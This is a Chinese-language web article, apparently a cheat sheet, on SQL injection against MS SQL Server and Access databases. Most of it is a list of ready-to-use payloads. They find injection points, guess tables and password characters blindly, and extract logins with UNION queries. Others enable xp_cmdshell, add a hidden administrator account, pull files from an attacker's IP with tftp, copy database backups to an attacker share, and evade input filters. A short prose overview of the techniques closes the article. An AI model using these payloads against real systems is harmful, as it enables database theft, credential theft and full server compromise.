所謂SQL注入，就是通過把SQL命令插入到Web表單提交或輸入域名或頁面請(qǐng)求的查詢字符串，最終達(dá)到欺騙服務(wù)器執(zhí)行惡意的SQL命令。很多情況下由于程序員的安全意識(shí)薄弱或基本功不足就容易導(dǎo)致sql注入安全問題，建議大家多看一下網(wǎng)上的安全文章，最好的防范就是先學(xué)會(huì)攻擊，下面一起看看要點(diǎn)!

　　方法技巧

　　1.判斷有無注入點(diǎn)

　　' ; and 1=1 and 1=2

　　2.猜表一般的表的名稱無非是admin adminuser user pass password 等..

　　and 0<>(select count(*) from *)

　　and 0<>(select count(*) from admin) ---判斷是否存在admin這張表

　　3.猜帳號(hào)數(shù)目 如果遇到0< 返回正確頁面 1<返回錯(cuò)誤頁面說明帳號(hào)數(shù)目就是1個(gè)

　　and 0<(select count(*) from admin)

　　and 1<(select count(*) from admin)

　　4.猜解字段名稱 在len( ) 括號(hào)里面加上我們想到的字段名稱.

　　and 1=(select count(*) from admin where len(*)>0)--

　　and 1=(select count(*) from admin where len(用戶字段名稱name)>0)

　　and 1=(select count(*) from admin where len(密碼字段名稱password)>0)

　　5.猜解各個(gè)字段的長度 猜解長度就是把>0變換 直到返回正確頁面為止

　　and 1=(select count(*) from admin where len(*)>0)

　　and 1=(select count(*) from admin where len(name)>6) 錯(cuò)誤

　　and 1=(select count(*) from admin where len(name)>5) 正確 長度是6

　　and 1=(select count(*) from admin where len(name)=6) 正確

　　and 1=(select count(*) from admin where len(password)>11) 正確

　　and 1=(select count(*) from admin where len(password)>12) 錯(cuò)誤 長度是12

　　and 1=(select count(*) from admin where len(password)=12) 正確

　　6.猜解字符

　　and 1=(select count(*) from admin where left(name,1)='a') ---猜解用戶帳號(hào)的第一位

　　and 1=(select count(*) from admin where left(name,2)='ab')---猜解用戶帳號(hào)的第二位

　　就這樣一次加一個(gè)字符這樣猜,猜到夠你剛才猜出來的多少位了就對(duì)了,帳號(hào)就算出來了

　　and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --

　　這個(gè)查詢語句可以猜解中文的用戶和密碼.只要把后面的數(shù)字換成中文的ASSIC碼就OK.最后把結(jié)果再轉(zhuǎn)換成字符.

　　'group by users.id having 1=1--

　　'group by users.id, users.username, users.password, users.privs having 1=1--

　　'; insert into users values( 666, 'attacker', 'foobar', 0xffff )--

　　UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'-

　　UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id')-

　　UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id','login_name')-

　　UNION SELECT TOP 1 login_name FROM logintable-

　　UNION SELECT TOP 1 password FROM logintable where login_name='Rahul'--

　　看服務(wù)器打的補(bǔ)丁=出錯(cuò)了打了SP4補(bǔ)丁

　　and 1=(select @@VERSION)--

　　看數(shù)據(jù)庫連接賬號(hào)的權(quán)限，返回正常，證明是服務(wù)器角色sysadmin權(quán)限。

　　and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'))--

　　判斷連接數(shù)據(jù)庫帳號(hào)。(采用SA賬號(hào)連接 返回正常=證明了連接賬號(hào)是SA)

　　and 'sa'=(SELECT System_user)--

　　and user_name()='dbo'--

　　and 0<>(select user_name()--

　　看xp_cmdshell是否刪除

　　and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell')--

　　xp_cmdshell被刪除，恢復(fù),支持絕對(duì)路徑的恢復(fù)

　　;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'--

　　;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','c:\inetpub\wwwroot\xplog70.dll'--

　　反向PING自己實(shí)驗(yàn)

　　;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";--

　　加帳號(hào)

　　;DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add'--

　　創(chuàng)建一個(gè)虛擬目錄E盤：

　　;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe c：\inetpub\wwwroot\mkwebdir.vbs -w "默認(rèn)Web站點(diǎn)" -v "e","e：\"'--

　　訪問屬性：(配合寫入一個(gè)webshell)

　　declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe c：\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse'

　　爆庫 特殊技巧：:%5c='\' 或者把/和\ 修改%5提交

　　and 0<>(select top 1 paths from newtable)--

　　得到庫名(從1到5都是系統(tǒng)的id，6以上才可以判斷)

　　and 1=(select name from master.dbo.sysdatabases where dbid=7)--

　　and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)

　　依次提交 dbid = 7,8,9.... 得到更多的數(shù)據(jù)庫名

　　and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') 暴到一個(gè)表 假設(shè)為 admin

　　and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('Admin')) 來得到其他的表。

　　and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin'

　　and uid>(str(id))) 暴到UID的數(shù)值假設(shè)為18779569 uid=id

　　and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) 得到一個(gè)admin的一個(gè)字段,假設(shè)為 user_id

　　and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in

　　('id',...)) 來暴出其他的字段

　　and 0<(select user_id from BBS.dbo.admin where username>1) 可以得到用戶名

　　依次可以得到密碼。。。。。假設(shè)存在user_id username ,password 等字段

　　and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)

　　and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') 得到表名

　　and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in('Address'))

　　and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id))) 判斷id值

　　and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段

　　?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin

　　?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union，access也好用)

　　得到WEB路徑

　　;create table [dbo].[swap] ([swappass][char](255));--

　　and (select top 1 swappass from swap)=1--

　　;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\', @value_name='/', values=@test OUTPUT insert into paths(path) values(@test)--

　　;use ku1;--

　　;create table cmd (str image);-- 建立image類型的表cmd

　　存在xp_cmdshell的測(cè)試過程：

　　;exec master..xp_cmdshell 'dir'

　　;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帳號(hào)

　　;exec master.dbo.sp_password null,jiaoniang$,1866574;--

　　;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;--

　　;exec master.dbo.xp_cmdshell 'net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--

　　;exec master.dbo.xp_cmdshell 'net localgroup administrators jiaoniang$ /add';--

　　exec master..xp_servicecontrol 'start', 'schedule' 啟動(dòng)服務(wù)

　　exec master..xp_servicecontrol 'start', 'server'

　　; DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C：\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add'

　　;DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C：\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add'

　　'; exec master..xp_cmdshell 'tftp -i youip get file.exe'-- 利用TFTP上傳文件

　　;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'

　　;declare @a sysname set @a='xp'+'_cm’+’dshell' exec @a 'dir c:\'

　　;declare @a;set @a=db_name();backup database @a to disk='你的IP你的共享目錄bak.dat'

　　如果被限制則可以。

　　select * from openrowset('sqloledb','server';'sa';'','select ''OK!'' exec master.dbo.sp_addlogin hax')

　　查詢構(gòu)造：

　　SELECT * FROM news WHERE id=... AND topic=... AND .....

　　admin'and 1=(select count(*) from [user] where username='victim' and right(left(userpass,01),1)='1') and userpass <>'

　　select 123;--

　　;use master;--

　　:a' or name like 'fff%';-- 顯示有一個(gè)叫ffff的用戶哈。

　　and 1<>(select count(email) from [user]);--

　　;update [users] set email=(select top 1 name from sysobjects where xtype='u' and status>0) where name='ffff';--

　　;update [users] set email=(select top 1 id from sysobjects where xtype='u' and name='ad') where name='ffff';--

　　';update [users] set email=(select top 1 name from sysobjects where xtype='u' and id>581577110) where name='ffff';--

　　';update [users] set email=(select top 1 count(id) from password) where name='ffff';--

　　';update [users] set email=(select top 1 pwd from password where id=2) where name='ffff';--

　　';update [users] set email=(select top 1 name from password where id=2) where name='ffff';--

　　上面的語句是得到數(shù)據(jù)庫中的第一個(gè)用戶表,并把表名放在ffff用戶的郵箱字段中。

　　通過查看ffff的用戶資料可得第一個(gè)用表叫ad

　　然后根據(jù)表名ad得到這個(gè)表的ID 得到第二個(gè)表的名字

　　insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--

　　insert into users values( 667,123,123,0xffff)--

　　insert into users values ( 123, 'admin''--', 'password', 0xffff)--

　　;and user>0

　　;and (select count(*) from sysobjects)>0

　　;and (select count(*) from mysysobjects)>0 //為access數(shù)據(jù)庫

　　枚舉出數(shù)據(jù)表名

　　;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0);--

　　這是將第一個(gè)表名更新到aaa的字段處。

　　讀出第一個(gè)表，第二個(gè)表可以這樣讀出來(在條件后加上 and name<>'剛才得到的表名')。

　　;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0 and name<>'vote');--

　　然后id=1552 and exists(select * from aaa where aaa>5)

　　讀出第二個(gè)表，一個(gè)個(gè)的讀出，直到?jīng)]有為止。

　　讀字段是這樣：

　　;update aaa set aaa=(select top 1 col_name(object_id('表名'),1));--

　　然后id=152 and exists(select * from aaa where aaa>5)出錯(cuò)，得到字段名

　　;update aaa set aaa=(select top 1 col_name(object_id('表名'),2));--

　　然后id=152 and exists(select * from aaa where aaa>5)出錯(cuò)，得到字段名

　　[獲得數(shù)據(jù)表名][將字段值更新為表名，再想法讀出這個(gè)字段的值就可得到表名]

　　update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>'你得到的表名' 查出一個(gè)加一個(gè)]) [ where 條件] select top 1 name from sysobjects where xtype=u and status>0 and name not in('table1','table2',…)

　　通過SQLSERVER注入漏洞建數(shù)據(jù)庫管理員帳號(hào)和系統(tǒng)管理員帳號(hào)[當(dāng)前帳號(hào)必須是SYSADMIN組]

　　[獲得數(shù)據(jù)表字段名][將字段值更新為字段名，再想法讀出這個(gè)字段的值就可得到字段名]

　　update 表名 set 字段=(select top 1 col_name(object_id('要查詢的數(shù)據(jù)表名'),字段列如:1) [ where 條件]

　　補(bǔ)充：SQL注入技術(shù)

　　強(qiáng)制產(chǎn)生錯(cuò)誤

　　對(duì)數(shù)據(jù)庫類型、版本等信息進(jìn)行識(shí)別是此類型攻擊的動(dòng)機(jī)所在。它的目的是收集數(shù)據(jù)庫的類型、結(jié)構(gòu)等信息為其他類型的攻擊做準(zhǔn)備，可謂是攻擊的一個(gè)預(yù)備步驟。利用應(yīng)用程序服務(wù)器返回的默認(rèn)錯(cuò)誤信息而取得漏洞信息。

　　采用非主流通道技術(shù)

　　除HTTP響應(yīng)外，能通過通道獲取數(shù)據(jù)，然而，通道大都依賴與數(shù)據(jù)庫支持的功能而存在，所以這項(xiàng)技術(shù)不完全適用于所有的數(shù)據(jù)庫平臺(tái)。SQL注入的非主流通道主要有E-mail、DNS以及數(shù)據(jù)庫連接，基本思想為：先對(duì)SQL查詢打包，然后借助非主流通道將信息反饋至攻擊者。

　　使用特殊的字符

　　不同的SQL數(shù)據(jù)庫有許多不同是特殊字符和變量，通過某些配置不安全或過濾不細(xì)致的應(yīng)用系統(tǒng)能夠取得某些有用的信息，從而對(duì)進(jìn)一步攻擊提供方向。

　　使用條件語句

　　此方式具體可分為基于內(nèi)容、基于時(shí)間、基于錯(cuò)誤三種形式。一般在經(jīng)過常規(guī)訪問后加上條件語句，根據(jù)信息反饋來判定被攻擊的目標(biāo)。

　　利用存儲(chǔ)過程

　　通過某些標(biāo)準(zhǔn)存儲(chǔ)過程，數(shù)據(jù)庫廠商對(duì)數(shù)據(jù)庫的功能進(jìn)行擴(kuò)展的同時(shí)，系統(tǒng)也可與進(jìn)行交互。部分存儲(chǔ)過程可以讓用戶自行定義。通過其他類型的攻擊收集到數(shù)據(jù)庫的類型、結(jié)構(gòu)等信息后，便能夠建構(gòu)執(zhí)行存儲(chǔ)過程的命令。這種攻擊類型往往能達(dá)到遠(yuǎn)程命令執(zhí)行、特權(quán)擴(kuò)張、拒絕服務(wù)的目的。

　　避開輸入過濾技術(shù)

　　雖然對(duì)于通常的編碼都可利用某些過濾技術(shù)進(jìn)行SQL注入防范，但是鑒于此種情況下也有許多方法避開過濾，一般可達(dá)到此目的的技術(shù)手段包括SQL注釋和動(dòng)態(tài)查詢的使用，利用截?cái)?，URL編碼與空字節(jié)的使用，大小寫變種的使用以及嵌套剝離后的表達(dá)式等等。借助于此些手段，輸入構(gòu)思后的查詢可以避開輸入過濾，從而攻擊者能獲得想要的查詢結(jié)果。

　　推斷技術(shù)

　　能夠明確數(shù)據(jù)庫模式、提取數(shù)據(jù)以及識(shí)別可注入?yún)?shù)。此種方式的攻擊通過網(wǎng)站對(duì)用戶輸入的反饋信息，對(duì)可注入?yún)?shù)、數(shù)據(jù)庫模式推斷，這種攻擊構(gòu)造的查詢執(zhí)行后獲得的答案只有真、假兩種?；谕茢嗟淖⑷敕绞街饕譃闀r(shí)間測(cè)定注入與盲注入兩種。前者是在注入語句里加入語句諸如“waitfor 100”，按照此查詢結(jié)果出現(xiàn)的時(shí)間對(duì)注入能否成功和數(shù)據(jù)值范圍的推導(dǎo)進(jìn)行判定;后者主要是“and l=l”、“and l=2”兩種經(jīng)典注入方法。這些方式均是對(duì)一些間接關(guān)聯(lián)且能取得回應(yīng)的問題進(jìn)行提問，進(jìn)而通過響應(yīng)信息推斷出想要信息，然后進(jìn)行攻擊。

SQL注入相關(guān)文章：

1.如何修復(fù)SQL注入漏洞

2.wifi如何斷開防火墻

3.路由器防止他人蹭網(wǎng)的設(shè)置方法步驟

4.如何判斷路由器有沒有被劫持

5.網(wǎng)絡(luò)安全技術(shù)的總結(jié)